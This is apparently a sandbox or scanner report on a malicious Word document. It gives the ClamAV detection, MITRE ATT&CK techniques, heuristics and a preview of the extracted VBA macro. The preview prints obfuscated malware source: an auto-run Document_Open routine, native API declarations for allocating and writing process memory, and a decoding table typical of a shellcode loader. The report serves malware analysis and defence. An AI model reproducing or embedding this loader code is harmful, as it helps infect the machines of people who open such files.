MALICIOUS
122
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The critical ClamAV heuristic and the high OLE_VBA_DOCOPEN firing indicate the presence of malicious VBA macros. The Document_Open macro is designed to execute code upon opening the document, likely to download and execute a secondary payload. While specific URLs are benign, the macro's structure and the presence of API declarations suggest a downloader or dropper functionality. The family is unknown due to the lack of specific indicators.
Heuristics 4
-
ClamAV: Doc.Downloader.Macro-6539595-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Macro-6539595-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 34284 bytes |
SHA-256: 2bf1d010a0c42eda175c0eed0a52eba5dd59f54e22bd487329864cddb6aaa42c |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() Dim acidotic As Byte Dim highboy As Long dealer = debilitation littlew.ascent megawatt = 28 + 1 Pmt 0, megawatt, 29717, 18842, 5 End Sub Attribute VB_Name = "titanium" #If (73 - 12 + 339 + 12 - 126 + 414) > ((12 - 105 + 413) - (40 - 85 + 585) * 1) And Not ((56 - 91 + 63) - (33 - 74 + 69)) * 2 < (Win64) Then Public Declare Function anthus _ Lib "Ntdll " Alias _ "NtAllocateVirtualMemory" (natantia As Long, custum As Long, ByVal tangent As Long, asterByVal As Long, amicus As Long, ByVal adornment As Long) As Long Public Declare Function adoration _ Lib "ntdll " Alias _ "AcquireSRWLockShared" (outstep As Any) As Long Public Declare Function bureau _ Lib "Shlwapi " Alias _ "SleepConditionVariableSRW" (ByVal asin As Any, dicynodontia As Any, coequal As Any, civilisan As Any) As Long Public Declare Function bouleversement _ Lib "Kernel32 " Alias _ "CreateEventW" (ByVal mayeng As Long, cephalanthera As Long, pisciculture As Long, synthetic As Long, scapegoat As Long) As Long Public Declare Function cephaloridine _ Lib "Ntdll " Alias _ "NtWriteVirtualMemory" (ByVal barbarus As Any, ByVal dragon As Any, ByVal celebrate As Any, ByVal equation As Any, ByVal artfully As Any) As Long Public Declare Function crankcase _ Lib "Kernel32" Alias _ "CreateTimerQueueTimer" (crookedness As Any, ByVal coetanian As Any, ByVal addictive As Any, ByVal rarely As Any, ByVal bonito As Any, ByVal motorist As Any, ByVal impracticable As Any) As Long Public Declare Function sortance _ Lib "Shlwapi " Alias _ "GetOverlappedResult" (ByVal acyclic As Any, bonded As Any, contemptuously As Any, stealthy As Any) As Long #End If Function ruck() Dim brasserie(255) As Byte chlorophyceae = 15 - 127 + 177 Do While chlorophyceae <= 90 + 1 brasserie(chlorophyceae) = chlorophyceae - 65 chlorophyceae = chlorophyceae + 1 Loop chlorophyceae = 48 Do While chlorophyceae <= 50 + 8 brasserie(chlorophyceae) = chlorophyceae + 4 chlorophyceae = chlorophyceae + 1 Loop chlorophyceae = 97 Do While chlorophyceae <= 120 + 3 brasserie(chlorophyceae) = chlorophyceae - 71 chlorophyceae = chlorophyceae + 1 Loop brasserie(47) = 63 chlorophyceae = 43 brasserie(chlorophyceae) = 60 + 2 ruck = brasserie End Function Function autopsy(poke, dispossession, conduce) #If (41 - 19 + 378 + 86 - 61 + 275) > ((55 - 39 + 304) - (40 - 75 + 575) * 1) And ((86 - 15 - 43) - (100 - 121 + 49)) * 2 < (Win64) Then Dim fellah As LongPtr Dim adrenal As LongPtr Dim percolation As LongPtr Dim beam As LongPtr Dim bb As LongPtr #ElseIf (34 - 6 + 372 + 57 - 11 + 254) > ((26 - 91 + 385) - (40 - 119 + 619) * 1) And Not ((118 - 126 + 36) - (3 - 22 + 47)) * 2 < (Win64) Then Dim adrenal As Long Dim calosoma As Byte Dim fellah As Long Dim exposed As Integer Dim beam As Long Dim resourceful As Byte Dim percolation As Long Dim alacritous As String Dim bb As Long Dim anapsida As Variant Dim phenylalanine As Variant #End If adrenal = poke bb = conduce beam = dispossession bluehead = 37 + 7 Pmt 0, bluehead, 26699, 43579, 8 fellah = 83 - 122 + 38 cephaloridine ByVal fellah, _ adrenal, beam, _ bb, percolation End Function Attribute VB_Name = "tenuere" Function candlemas(chamaemelum, participial, legally) Select Case legally Case 32 + (10 / 2 - 5) candlemas = chamaemelum \ participial Case 42 + (5 - 3) / 2 - 1 candlemas = chamaemelum And participial Case 50 + (56 / 7 - 4 * 2) candlemas = chamaemelum * participial End Select End Function Function excitabat(idol) As String Dim motivated As Long Dim pyrotechny As Long Dim defensively(6962) As Byte Dim insider As Long Dim aniseikonia(63) As Long Dim beefwood(63) As Long Dim infelicitous() As Byte Dim helical(63) As Long Dim bruiser As Long ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.